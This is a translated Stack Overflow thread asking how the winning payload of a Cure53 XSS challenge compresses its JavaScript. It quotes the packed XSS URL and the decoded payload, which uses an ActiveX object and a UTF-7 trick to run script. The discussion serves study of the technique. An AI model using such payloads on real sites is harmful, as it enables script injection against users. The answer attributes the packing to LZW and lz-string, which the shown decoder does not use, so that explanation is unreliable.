我正在检查涉及 XSS (link) 的安全竞赛的结果,发现了一些美妙而可怕的 JS XSS payloas。获胜者 (@kinugawamasato) 使用了一种 javascript 压缩技术,这对我来说似乎完全不同凡响:
压缩负载:
https://cure53.de/xmas2013/?xss=<scriPt>document.write(unescape(escape(location)
.replace(/u(..)/g,'$1%')))<\/scriPt>㱯扪散琠楤㵥污獳楤㵣汳楤㨳㌳䌷䉃㐭㐶うⴱㅄ〭
䉃〴ⴰ〸ぃ㜰㔵䄸㌠潮牯睥湴敲㵡汥牴⠯繷⸪ℱ⼮數散⡲散潲摳整⠰⤩⤾㱳癧湬潡搽攮摡瑡畲氽慬汛攮
牯睤敬業㴳㍝⬧㽳慮瑡㵀Ⅱ汬潷彤潭慩湳㴧⭤潭慩渻攮捨慲獥琽❵瑦ⴷ✾
到底发生了什么:
<object id=e classid=clsid:333C7BC4-460F-11D0-BC04-0080C7055A83 onrowenter=alert(/~w.*!1/.exec(recordset(0)))><svg onload=e.dataurl=all[e.rowdelim=33]+'?santa=@!allow_domains='+domain;e.charset='utf-7'>
这项技术是否已经在某处记录下来以便我可以研究它?这东西究竟是如何工作的?是否已经有一些 javascript 压缩器可以自动执行此操作? WAF 将如何应对这样的负载?
你可以看到更多的例子here .
最佳答案
我正在使用 lz-string每当将任何数据放入 localStorage
时用于 JS 压缩的库。我只是这个库的用户——不是压缩专家。但这是可以在该工具周围找到的信息...
lz-string目标:
lz-string was designed to fulfill the need of storing large amounts of data in
localStorage
, specifically on mobile devices. localStorage being usually limited to 5MB, all you can compress is that much more data you can store.... I (note: "I" means, Pieroxy, author of the lz-string) started out from an LZW implementation (no more patents on that), which is very simple...
所以,这个实现的基础是 LZW,这里提到了它 Javascript client-data compression通过 Andy E .让我指出
The scenario described by Welch's 1984 encodes sequences of 8-bit data as fixed-length 12-bit codes. The codes from 0 to 255 represent 1-character sequences consisting of the corresponding 8-bit character, and the codes 256 through 4095 are created in a dictionary for sequences encountered in the data as it is encoded. At each stage in compression, input bytes are gathered into a sequence until the next character would make a sequence for which there is no code yet in the dictionary. The code for the sequence (without that character) is added to the output, and a new code (for the sequence with that character) is added to the dictionary.
A high level view of the encoding algorithm is shown here:
- Initialize the dictionary to contain all strings of length one.
- Find the longest string W in the dictionary that matches the current input.
- Emit the dictionary index for W to output and remove W from the input.
- Add W followed by the next symbol in the input to the dictionary.
- Go to Step 2.
在我们可以观察到的 lz 字符串的情况下它是如何工作的:
让我引用已经提到的 lz-string source 中的几个步骤:
What I did was:
- localStorage can only contain JavaScript strings. Strings in JavaScript are stored internally in UTF-16, meaning every character weight 16 bits. I modified the implementation to work with a 16bit-wide token space.
- I had to remove the default dictionary initialization, totally useless on a 16bit-wide token space.
- I initialize the dictionary with three tokens:
- An entry that produces a 16-bit token.
- An entry that produces an 8-bit token, because most of what I will store is in the iso-latin-1 space, meaning tokens below 256.
- An entry that mark the end of the stream.
- The output is processed by a bit stream that stores effectively 16 bits per character in the output string.
- Each token is stored with just as many bits that are needed according to the size of the dictionary. Hence, the first token takes 2 bits, the second to 7th three bits, etc....
好吧,现在我们知道,通过这些压缩技术,我们可以获得 16 位信息。我们可以在这个演示中测试它:http://pieroxy.net/blog/pages/lz-string/demo.html (或/和另一个 here)
它将:Hello, world.
转换为
85 04 36 30 f6 60 40 03 0e 04 01 e9 80 39 03 26
00 a2
所以我们需要最后一步,让我再次引用:
Well, this lib produces stuff that isn't really a string. By using all 16 bits of the UTF-16 bitspace, those strings aren't exactly valid UTF-16. By version 1.3.0, I added two helper encoders to produce stuff that we can do something with:
compress
produces invalid UTF-16 strings. Those can be stored inlocalStorage
only on webkit browsers (Tested on Android, Chrome, Safari). Can be decompressed withdecompress
继续我们的示例,Hello, world.
将被转换为
҅〶惶̀Ў㦀☃ꈀ
最后就是这样。我们可以看到,所有 ...其他拉丁字符... 的集合来自最终转换为 UTF-16。希望,这会给出一些提示...
关于javascript - 这种 javascript 压缩技术是如何工作的?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/23120115/